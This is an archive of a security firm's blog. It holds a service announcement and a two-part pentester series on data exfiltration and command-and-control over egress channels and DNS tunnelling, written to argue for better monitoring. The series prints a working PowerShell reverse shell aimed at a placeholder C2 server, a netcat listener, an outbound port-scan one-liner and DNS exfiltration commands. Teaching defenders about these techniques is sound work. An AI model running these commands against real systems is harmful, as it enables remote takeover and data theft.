Information Technology Assessment Archives - SIQ

SIQ Expands Services to Support Compliance with New Cybersecurity Directive

Tina Predan — Tue, 10 Dec 2024 08:47:05 +0000

SIQ is proud to announce that it is now fully equipped to assist customers in meeting the requirements of the new EU Cybersecurity Directive. This expansion of services is designed to help businesses safeguard their digital infrastructure, ensuring compliance with the latest cybersecurity standards and regulations.

The directive introduces stringent security requirements, particularly focusing on Internet of Things (IoT) devices, connected consumer products, and networked electronic equipment. To address these challenges, SIQ offers comprehensive cybersecurity assessments, including:

External and Internal Penetration Testing: Identifying vulnerabilities in external infrastructure, such as servers and applications, while testing the resilience of internal security controls.
Web and Mobile Application Testing: Detecting weaknesses that could allow unauthorized data access and modification.
Wireless Technology Assessments: Evaluating the security of wireless networks to prevent unauthorized access.
IoT and Embedded Device Security: Ensuring the safety of IoT devices, including connected home automation systems, wearable health trackers, and smart home appliances.

SIQ is accredited for ISO 27001 and eIDAS regulations and offers services aligned with key standards ETSI EN 303 645 and EN 18031, ensuring that clients not only meet regulatory requirements but also enhance the overall security of their products and systems.

With the introduction of these services, SIQ aims to be a trusted partner in navigating the evolving cybersecurity landscape, helping businesses protect their assets, comply with legal obligations, and maintain consumer trust in a digital age.

For more information, contact us at safety@siq.si. Stay cyber safe with SIQ!

The post SIQ Expands Services to Support Compliance with New Cybersecurity Directive appeared first on SIQ.

Even hackers wear (protective) masks, part 2

Nina Erjavec — Wed, 13 May 2020 06:25:44 +0000

In part 1 of this blog series, we considered two fundamental goals of cyber attackers, i.e. remote control of a victim and covert persistence from the attacker’s “command&control” (C2) server. We know first-hand that the set-up of a reverse communication channel to internal assets of the target organisation is not always trivial. The ultimate manoeuvre used by pentesters on site in equally extreme situations is reverse tunnelling through the established DNS (Domain Name Service) protocol. The technique, which (sadly) is known not only to trained “ethical” hackers, will be demonstrated in this blog post.

As already mentioned, we also encounter exemplary security-hardened systems that do not permit random communication with external untrustworthy sources. In the best case, a pentester or a red teamer or, in the worst-case scenario, a hacker or injected malicious code tend to find their opportunity in legitimate communication channels (e.g. HTTP(S), RDP, SMTP, etc.). Modern security approaches may be used to detect obfuscation attempts in the form of so-called tunnelling relatively easily. Such techniques can be prevented efficiently as early as at network level. The same goes for the protocol and application inspection of the DNS protocol, which is often side-tracked – in the same manner as it was deliberately forgotten in the previous blog. To illustrate the issue, we provide an attractive description of a tool, otherwise widely available on the world wide web, that enables covert management of a remote system or exfiltration of data from it.

The shell uses legitimate DNS requests and responses to encode commands and exfiltrated data, making the traffic look like just a bunch of funky DNS requests on the wire.

But let’s start at the basics. The legacy DNS service is considered as indispensable and is often compared to the traditional phone book in the world of the Internet. Namely, it enables the resolution of domain-name identifiers (e.g. of devices or services) to their corresponded Internet addresses used by connected ICT systems for communication with one another. It has been found that the prevalence of the DNS concept is the most likely reason for the perceived trust in it and its weak supervision in terms of cybersecurity. At this point, we would like to further enhance the initial observation; we believe that an analysis of DNS resolutions in typical organisations is anything but fulfilled potential.

Here are three essential arguments for continuous monitoring of DNS traffic:

Expansion of security visibility within the organisation to a arbitrary type of communication that uses DNS (e.g. HTTP(S), RDP, SSH or any other attempt of an egress tunnelling from an infected device) for naming resolution.
DNS resolution is also used by Advanced Persistent Threats (e.g. DGA – Domain Generation Algorithm).
The integration of hybrid security solutions with dedicated Threat Intelligence Feeds that incorporates DNS IOCs (Indicators of Compromise).

Permitted use of DNS even in the most restricted environments is, as a rule, good news for a hacker, both an ethical as well as a malicious one. It provides sufficient leverage for its abuse in circumstances when remote control via other (more intuitive) channels is not permitted. It turns out that a seemingly more conservative perimeter security policy that allows outgoing communication solely through UDP/53 socket with merely the trustworthy primary DNS server is considered lax enough. Moreover, the hierarchical design of the DNS concept allows reliable interaction between a (un)controlled malicious code (in the organisation’s internal network) and the attacker’s C2 server even though there is no direct connectivity with the victim of the attack or the latter is not allowed or is explicitly prohibited by perimeter security policy (e.g. firewalls). This unique behavior is shown in the example below:

To execute such an attack, the attacker must register a domain of his choice (a one-off cost of $2 suffices) with its corresponding authoritative DNS server pointing to the C2 command server in attacker’s possession. A malicious daemon is set up on the latter that is not aimed at serving legitimate DNS responses, but at interacting with a (un)controlled code on the compromised victim.

To demonstrate the technique, we registered the domain siq.best:

DOMAIN REGISTRATION:
whois siq.best | grep name
Domain Name: SIQ.BEST
Name Server: C2_SERVER_FQDN
Name Server: NS4.MOJHOST.SI

Below is a concise demonstration of the exfiltration of a sensitive information using the described technique:

VICTIM [SIQ\mmesojednik]:
PS C:\Tools\DNSExFil> Invoke-DNSExfiltrator -i C:\IMPORTANT\contract.txt -d siq.best -p password
[*] Compressing (ZIP) the [contract.txt] file in memory
[*] Encrypting the ZIP file with password [password]
[*] Encoding the data with Base64URL
…
[*] Sending data…
[*] DONE !

ATTACKER [C2 server | Authoritative DNS server]
#python dnsexfiltrator.py -d siq.best -p password
[*] DNS server listening on port 53
[+] Data was encoded using Base64URL
…
[+] Receiving file [contract.txt] as a ZIP file in [1] chunks
[============================================================] 100.0%
…
[+] Decrypting using password [password] and saving to output file [contract.txt.zip]
[+] Output file [contract.txt.zip] saved successfully
…
# zcat contract.txt.zip
TOP SECRET!!!

The uniqueness of the above technique, which makes it even more convincing and efficient, is the masking of the identity (IP address or FQDN) of the C2 command server throughout the exfiltration procedure. Perhaps you have noticed that only the domain name is specified in the command-line switches above, but not the server address itself.

As evident from the traffic capture (use of the Wireshark tool) on the part of the simulated victim, the latter directly communicates only with the primary trustworthy DNS server. The Internet address of the C2 command server, which at the same time plays the role of the authoritative DNS server for the attacker’s siq.best domain, does not appear in the captured communication. The latter makes it extremely difficult to detect and prevent such an attack.

The actual interaction and created haze in the process of data exfiltration are evident from the recorded traffic. Indicators of compromise (IOCs) or deviation from legitimate DNS resolutions should obviously be (threat) hunted elsewhere, e.g. in high entropy of sought sub-domains of the umbrella domain siq.best, in the intensity of DNS querying from a single source, in the generated volume of DNS traffic, etc.

At this point, we would like to hold our breaths for a while and invite you, the readers, to share your experiences. The same invitation is also extended to specialized blue teams, Security Operations Centres (SOC) and enthusiastic IT specialists who detect and prevent the described techniques continuously and on an ongoing basis. Stay tuned …

The post Even hackers wear (protective) masks, part 2 appeared first on SIQ.

Even hackers wear (protective) masks, part 1

Nina Erjavec — Fri, 08 May 2020 08:05:42 +0000

The leakage or theft of sensitive information constitutes a serious security breach or a form of cybercrime. Hence, it is not uncommon that security experts consider data exfiltration as one of the more representative targets of motivated cyber attackers [MITRE ATT&CK], [CYBER KILL-CHAIN].

In a series of articles – in the role of an independent pentester – we outline typical deficiencies in the design of information systems that (all too) often fail to provide sufficient ability to detect and prevent such attacks. In the first section, the issue of weak restrictions on egress communication in typical information systems of organisations is presented to the reader. The central part provides a description of more advanced malware technology that is based on the abuse of the perfectly legitimate and established DNS protocol (Domain Name Service), but enables complete control of the compromised system or, rather, the leakage of the data stored on it. The conclusion gives recommendations to enhance existing security mechanisms, so as to minimise the effect of established hacker techniques.

A simple test that is systematically performed in the client’s information system (e.g. as part of pentest or red teaming engagement) within the scope of reconnaissance is the test of restricting outbound communication. The latter is carried out in the direction from the user, e.g. a company employee or a home-based employee, towards the Internet. In the example below, we used Powershell. The tool is present by default in all modern versions of the MS Windows operating system and is, as such, (easily) accessible not only to users but also to a successful attacker or injected malicious code:

1.. 65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(“C2_IP“,$_)) “Port $_ is open!”} 2>$null

With the use of a simple one-liner, we check the selection of open communication channels in the direction from the user to the Internet. One might question the true significance or sensibility of doing such a test. Attackers are nevertheless outside secured information environments, which is why their attempts are expected to be targeted in the opposite direction. Many independent studies and specialists in information security have warned of the predominant share of cyber-attacks of internal origin.

Typical components of such an attack are:

persistence and
command and control (C2) of the compromised system.

C2 technique [2] is based on the set-up of a reverse communication channel between the victim and the attacker’s command&control server and is usually the result of the launch of malicious code (e.g. by a user who clicks on a malicious attachment) or exploitation of a critical vulnerability of a running tool or application on a compromised system. A malicious reverse connection is established in the direction from the user towards the Internet, which makes it even harder to identify it and contain it in (at least) a seemingly legitimate communication between internal users and the worldwide web. Taking into account the predominant finding from security checks, i.e. that egress security policies of edge security devices are much laxer than ingress ones, the success of a C2 connection to the attacker’s server is more probable.

Let us consider at this point which egress communication channels are usually permitted in the edge security systems of organisations. In the wild, pentesters are exceptionally, rather than as a rule, faced with enhanced configurations in terms of security, where the selection of permitted employee communications is selectively restricted solely to the web (e.g. HTTP/HTTPS) and mail service (e.g. IPAM, MAPI, SMTP). These are considered to be the most widely established forms of communication and information exchange in business entities, which is why their existence is practically urgent.

Nevertheless, does the restriction of communication channels (to exclusively web and mail) suffice for efficient cyber defence? It turns out that well-established communication channels, particularly when they are additionally encrypted (e.g. HTTPS, IMAPS), also provide an ideal ground for masking malicious activities by more and more skilful cyber attackers. Another extreme phenomenon has also been noticed in which nominally “secure” protocols (e.g. HTTPS) are, knowingly and due to the questionable impact of inspection, not subject to in-depth analysis on dedicated security devices. We believe that to be entirely unjustified, which can be seen from another example. The activated protocol and application inspection of TCP/80 should undoubtedly (or unambiguously) recognise the lower “loud” attempt to set up a reverse command shell.

VICTIM [SIQ\mmesojednik]:
$client = New-Object System.Net.Sockets.TCPClient(“C2_server”,80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()

ATTACKER [C2 SERVER]:
#nc -nlvp 80
Ncat: Listening on :::80
Ncat: Connection from CLIENT_IP
…
>whoami
>siq\mmesojednik

The captured traffic (use of the Wireshark tool) clearly shows the tunnelling of the command shell via TCP/80, which is ordinarily intended for web browsing (HTTP):

To that end, next-generation security solutions have an in-built ability to identify protocol and/or application deviations on random transport channels.

Organisations with an efficient defence strategy in place against the most advanced cyber-attacks carry out a similar inspection of any interaction with service users, independently of the use of:

the transport protocol (TCP or UDP),
transport ports (TCP/80, TCP/443) or
additional layers of encryption (HTTP, HTTPS).

Remember, all of the above communication channels may be – in the event of weak protocol or application inspection – the attacker’s window of opportunity for undetectable:

delivery of malicious code,
its further spread and/or enhancement and
leakage of sensitive information.

Pentesters rarely encounter information environments with an extremely selective egress security policy that would completely prevent the use of the mentioned techniques. And yet we are also prepared for extreme circumstances, where the pentesters’ (attackers’) interactions with external entities are not permitted or likely.

The second part (part 2) of the series of articles will show a more advanced technique to abuse the DNS protocol, the use of which has been considered indispensable by most organisations. On the other hand, its successful abuse provides the attacker with remote control, overall management and leakage of data even from environments with extremely conservative security policy in place. Stay tuned …

The post Even hackers wear (protective) masks, part 1 appeared first on SIQ.